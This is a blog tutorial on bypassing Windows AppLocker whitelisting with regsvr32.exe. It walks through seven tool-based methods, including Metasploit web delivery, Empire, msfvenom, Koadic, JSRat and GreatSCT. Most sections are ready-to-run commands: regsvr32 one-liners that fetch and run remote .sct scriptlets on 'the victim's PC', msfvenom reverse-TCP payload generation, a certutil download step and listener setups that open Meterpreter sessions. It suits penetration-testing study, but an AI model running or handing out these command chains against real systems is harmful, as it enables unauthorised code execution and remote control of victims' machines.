This purpose to write this post is to
demonstrate the most common and familiar techniques of whitelisting AppLocker
bypass. As we know for security reason the system admin add group
policies to restrict app execution for local user. In our previous article, we
had discussed on “Windows
Applocker Policy – A Beginner’s Guide” as they defines the
AppLocker rules for your application control policies and how to work with
them. But today you will learn how to bypass Applocker policies with regsvr32.exe.
Tables of content
·
Introduction to regsvr
·
Working of regsvr
·
Multiple methods to attack regsvr
Introduction
Regsvr32 stands for Microsoft Register
Server. It is a windows command-line utility tool. While regsvr32 causes
problems sometimes; it’s an important file as its windows system file. The file
is found in the subfolder of C:\Windows. This file is able to observe, track
and influence other programs. It’s mainly used to register and unregister
programs in windows. File extension for this is .exe and its process widely
assists OLE (Object Linking and embedding), DLL (Data Link Libraries) and OCX
(ActiveX control modules). The said process works in the background and can be
seen via task manager. Its Microsoft's one of the trusted files.
Working
Information about programs associated with
regsvr32 is added to windows, when you register a DLL file in regsvr32. These defences
are then accessed to understand where the program data is and how to interact
with it. As while registering a DLL file, information is added to central to
directory so that it can be used by the windows. The whole path of these files
literally has the executable code and due to this windows can call upon specific
functions and use them to call executable code. These files are very convenient
as when a software is updated, these file automatically call upon the updated
version; in short it helps avoid the version problems of a software. Usually
this file is not commonly used except for registering and unregistering DLL
files.
RegSvr32.exe has the
following command-line options:
Syntax: Regsvr32
[/s][/u] [/n] [/i[:cmdline]]
/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes
Multiple Methods
·
Web delivery
·
Empire
·
Manual
·
MSFVenom
·
Koadic
·
JSRat
·
GreatSCT
Web Delivery
This module quickly fires up a web server
that serves a payload. The provided command which will allow for a payload to
download and execute. It will do it either specified scripting language
interpreter or “squiblydoo” via regsvr32.exe for bypassing application
whitelisting. The main purpose of this module is to quickly establish a session
on a target machine when the attacker has to manually type in the command: e.g.
Command Injection.
Regsvr32 uses “squiblydoo” technique for
bypassing application whitelisting. The signed Microsoft binary file, Regsvr32,
is able to request a .sct file and
then execute the included PowerShell command inside of it. Both web requests
(i.e., the .sct file and PowerShell download/execute) can occur on the same
port. “PSH (Binary)” will write a file to the disk, allowing for custom
binaries to be served up to be downloaded/executed.
use exploit/multi/script/web_delivery
msf
exploit (web_delivery)>set target 3
msf
exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf
exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set
srvhost 192.168.1.109
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below:
Once the exploit is running; you will have
a URL made for you. Run that URL in the command prompt of the Victim’s PC as
shown below:
regsvr32
/s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
Once you hit enter after the command, you
will have your session. Type ‘sysinfo’ for the information of the PC as shown
in the image below:
PowerShell Empire
For our next method of regsvr Attack we
will use empire. Empire is a post-exploitation framework. Till now we have
pairing our .sct tacks with metasploit but in this method we will use empire
framework. It’s solely python based powershell windows agent which make it
quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui,
and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.
To have a basic guide of Empire, please
visit our article introducing empire à https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the empire framework is started, type
listener to check if there are any active listeners. As you can see in the
image below that there are no active listeners. So to set up a listener, type :
uselistner
http
set
Host http://192.168.1.109
execute
With the above commands, you will have an
active listener. Type back to go out of listener so you can initiate your
powershell.
Once you are out the listener, you need to
use an exploit to create your malicious file. A stager, in empire, is a snippet
of code that allows our malicious code to be run via the agent on the
compromised host. Which means to create an exploit, we will have to use stager.
Therefore, type :
usestager
windows/launcher_sct
set
listener http
execute
After the execution of execute command,
usestager will create a launcher.sct in /tmp. Now to get session start the
python server by typing:
python
-m SimpleHTTPServer 8080
As the server is on, the only step left is
to execute our malware in the victim’s PC. For this, type the following command
in the command prompt :
regsvr /s /n /u
/i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
In the above command we have used port 8080
because our server of python is activated on the same port.
Once the above is executed as told, you
will receive a session. To access the session type :
interact
9ATUX4M7
here,
9ATUX4M7 : is a agent/session name. this
will vary from session to session.
Inject PowerShell code in sct File
(Manual Method)
Our next method manual with a help of an
exploit. The exploit we will use will help us to create a powershell code. So
let’s first create our powershell and for this go to the terminal of kali and
type :
After running this exploit, it will show
you the powershell code on the terminal screen as shown in following image :
use exploit/multi/script/web_delivery
msf
exploit (web_delivery)>set target 2
msf
exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf
exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set
srvhost 192.168.1.109
msf
exploit (web_delivery)>exploit
Copy the highlighted text shown in below:
Now we need to create .sct file in order
for our attack to run. We found a script online to create a .sct file. You can
access the link for the script by clicking here. The script is shown in image
below :
Copy the powershell code which was created
by web_delivery and paste it in the above script where it says “calc.exe” as
shown in the image below and then finally save it with .sct extension.
Then repeat above step to run .sct file
with regsvr32.exe in the victim’s PC:
regsvr32 /u /n /s /i:http://192.168.1.109/1.sct
scrobj.dll
As soon as the above command is executed,
you will have your session through web_delivery. To access the sessioni type
‘sessions 1’ and ‘info’ to have basic information of the system.
MsfVenom
Our next method is to use msfvenom. Through
this method we will create a two .sct, one to download our malware and another
to execute it. But first let’s get going
with msfvenom and for that type :
msfvenom
-p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe >
shell.exe
Start up the python server using following command:
python
-m SimpleHTTPServer 80
And simultaneously, in the same script,
used in the previous method inject certutil.exe command to call the shell.exe
file from remote server. Therefore, instead of “calc .exe” write the following
and save file again with .sct extension:
We have used curtutil here as it allows to
download a file in windows and also saved file as 3.sct.
Now, run the above script using following command:
regsvr32 /u /n /s /i:http;//192.168.1.109/3.sct
scrobj.dll
We will create another file to execute our
previous file “shell.exe”. For that again take the same script and where its
written “calc.exe”; therefore write :
“cd
/k cd c:\Users\raj & shell.exe”
This we have saved script as 4.sct and again
run this script using the following command :
regsvr32 /u /n /s /i:http;//192.168.1.109/4.sct
scrobj.dll
Side by side start up the multi handler
too, to get a session. Hence, type :
use
exploit/multi/handler
msf
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf
exploit(multi/handler) > set lhost 192.168.1.109
msf
exploit(multi/handler) > set lport 1234
msf
exploit(multi/handler) > exploit
After running the command in victim’s PC, u
will have meterpreter session.
Koadic
Our next method is using Koadic. Koadic, or COM Command &
Control, is a Windows post-exploitation rootkit similar to other penetration
testing tools such as Meterpreter and Powershell Empire. To know more about
Koadic please read our detailed articled on the said framework through this
link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once the koadic is up and running, type:
use
stager/js/regsvr
set
srvhost 192.168.1.107
run
After this, type the following in the
command prompt of the victim’s:
regsvr32 /u /n /s /i:http;//192.168.1.107:9998/uWBjv
scrobj.dll
Once you run the above command, you will
have a session. To access the session type :
zombie
0
JSRat
Our next method of attacking regsvr32 is by
using JSRat and you can download it from github. This is
another very small command and control framework just like koadic and
Powershell Empire for generating malicious task only for rundll32.exe and
regsvr32.exe. JSRat will create a webserver and on that webserver we will find
our .sct file. To use this method type:
./JSRat.py
-I 192.168.1.107 -p 4444
Running the above command will start webserver.
Open this in your browser as shown below.
Here, you will find the .sct file that you need to run on your victim’s PC.
As we have got the command, run the command
in the run window as shown in the image below:
After executing the command in the run
window you will have a session as shown:
GreatSCT
GreatSCT is tool that allows you to use
Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current
under support by @ConsciousHacker. You can download it from https://github.com/GreatSCT/GreatSCT
Once its downloaded and running, type the
following command to access the modules :
use
Bypass
Then type ‘list’ to get the list of modules.
List of modules will appear as shown in
image below :
From the list of modules choose the
following :
use
regsvr/shellcode_iject/base64_migrate.py
generate
After the above commands, type 1 to choose MSFVenom
Then it will ask you for payload. Just
press enter as it will take windows/meterpreter/reverse_tcp
as a default payload and that is the one we need. After that provide IP like
here we have given 192.168.1.107 and the give port (any) as here you can see in
the image below that we have given lport as 2345
After giving the details, it will ask you a
name for your malware. By defualt it will set name ‘payload’ so either your can
give name or just press enter for the default settings.
And just as you press enter it will
generate two files. One of then will a resource file ad other will be .sct
file.
Now, firstly, start the python’s server in
/usr/share/greatsct-output by typing :
python
-m SimpleHTTPServer 80
Now execute the .sct file in the run window
of the victim’s PC as shown below.
Simultaneously, start the multi/handler
using recourse file. For this, type :
msfconsole
-r /usr/share/greatsct-output/handlers/payload.rc
And you have meterpreter session.
Conclusion
Using regsvr32 to gain a session is write
unusual way but it’s very important. And so above mentioned methods uses
different tools and software to allow us to perform this attack.
0 comments:
Post a Comment